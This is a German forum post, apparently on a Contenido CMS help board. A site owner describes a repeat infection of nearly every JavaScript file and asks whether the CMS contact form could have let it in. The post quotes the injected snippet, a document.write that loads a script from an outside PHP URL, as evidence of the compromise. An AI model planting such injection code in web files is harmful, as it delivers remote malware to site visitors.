Dank meines Requestblockers ging da nichts raus, aber ich frage mich, wie ich zu diesem Link komme?
Im HTML-Seitenquelltext findet sich nämlich nichts, aber sowohl im Backend im Editmodus als auch im Frontend erscheint dieser Request, als ob er vom PHP-Programm aus gestartet wird.
Das war vor dem Einbau eines Kontakformulars über den Form Assistant nicht gewesen, daher besteht ein zumindest zeitlicher Zusammenhang.
Was aber nichts bedeuten muss, denn diese Seite war schon einmal gehackt und alle Javascript Dateien waren befallen.
Nun auch diesesmal das Gleiche in nahezu jeder .js Datei:
Code: Alles auswählen
/*697bf7*/
/**/
document.write("<script type='text/javascript' src='http://chameleon-media.de/YX7N9QF3.php'></"+ "script>");
/*/697bf7*/
Ich möchte hier nur ausschließen, dass über Contenido irgendwas hereingekommen sein könnte.
Denn dann kann es fast nur noch am Kunden-PC oder eben am Hoster (Account) liegen.
...dank dem lieben Datenschutz habe ich keinen Zugriff aufs Serverlogfile, kann also nicht sagen, wer wann und von wo aus auf den Account zugegriffen hat.